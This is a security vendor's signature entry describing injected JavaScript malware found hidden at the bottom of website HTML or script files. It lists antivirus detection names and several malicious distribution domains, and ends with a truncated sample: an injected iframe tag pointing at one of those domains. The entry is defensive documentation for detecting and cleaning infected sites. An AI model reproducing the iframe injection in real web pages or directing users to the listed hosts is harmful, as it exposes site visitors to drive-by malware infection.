SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware-entry-mwjs2369

malware-entry-mwjs2369

Description:

A malicious and remote javascript file was found inside the site content and is being used to distribute malware (from blaackhatt58.us.to and other domains). Any user visiting the infected site could be compromised (desktop antivirus will flag it as JS:Cruzer-B, JS/Obfuscated, JS/Cruzer.C.gen, JS/TrojanDownloader.Agent.NKW and others, depending on the intermediary domains and AV product).

 

Domains used in this attack:

blaackhatt58.us.to<br />
heidiheernande.us.to<br />
gufmaurr79.us.to/kwizhveo.php<br />
(and many others)

Affecting:

Any web site (no specific target).

 

Clean up:

This malware is generally hidden at the bottom of the .html or javascript files. Sign up here to get it clean up: Signup

 

Malware dump (sample of malware):

<iframe src="http://blaackhatt58.us.to/kwizhveo.php" ..